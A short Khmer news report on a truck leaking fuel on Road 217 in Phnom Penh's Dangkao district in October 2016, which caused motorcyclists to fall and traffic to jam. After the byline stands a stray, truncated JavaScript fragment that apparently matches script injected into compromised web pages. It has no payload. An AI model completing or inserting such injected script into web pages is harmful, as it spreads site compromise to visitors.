អ្នកធ្វើដំណើរដួលបន្ដបន្ទាប់គ្នា ដោយសារសាស័រមួយគ្រឿងបែកបូមប្រេងហូរពេញផ្លូវ

ភ្នំពេញ៖ សាស័រមួយគ្រឿងបែកបូមប្រេង ហូរពេញផ្លូវបណ្ដាលអោយអ្នកធ្វើដំណើរដួលបន្ដបន្ទាប់គ្នា នឹង បង្ករអោយការកកស្ទះយ៉ាងខ្លាំង។ ហេតុការណ៍នេះកើតឡើងកាលពីវេលាម៉ោង ២ នឹង ៣០ នាទី ថ្ងៃទី៦ ខែតុលា ឆ្នាំ២០១៦ ស្ថិតនៅតាមបណ្ដោយផ្លូវ ២១៧ ក្នុងភូមិ សំបួរ សង្កាត់ដង្កោ ខណ្ឌដង្កោ។
បើតាមប្រភពពត៌មានពីកន្លែងកើតបានអោយដឹងថាមុនពេលកើតហេតុគេឃើញមានសាស័រមួយគ្រឿងបើកចេញពីក្រុមហ៊ុន ស៊ីភិច ក្នុងទិសដៅពីត្បូងទៅជើង លុះមកដល់ចំណុចកើតហេតុគេឃើញមានប្រេងហូរពេញផ្លូវដោយចេញពីសាស័រ ខណៈនោះក៍បណ្ដាលអោយមានអ្នកធ្វើដំណើរដួលជាបន្ដបន្ទាប់គ្នា នឹង មានការកកស្ទះចរាចរយ៉ាងខ្លាំង។ ភ្លាមនោះក្រុមសន្ដិសុខខណ្ឌបានចុះអន្ដរាគមន៍បាននាំគ្នាដឹកខ្សាច់យកមកចាក់ពីលើ ដើម្បីលាងអោយអស់ជាតិប្រេងនឹងជួយសម្រួលចរាចរណ៍ដើម្បីបញ្ជាស់នូវការកកស្ទះជូនដល់ប្រជាលរដ្ឋ។ដោយ៖ អាត ចន្ធូ

 var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More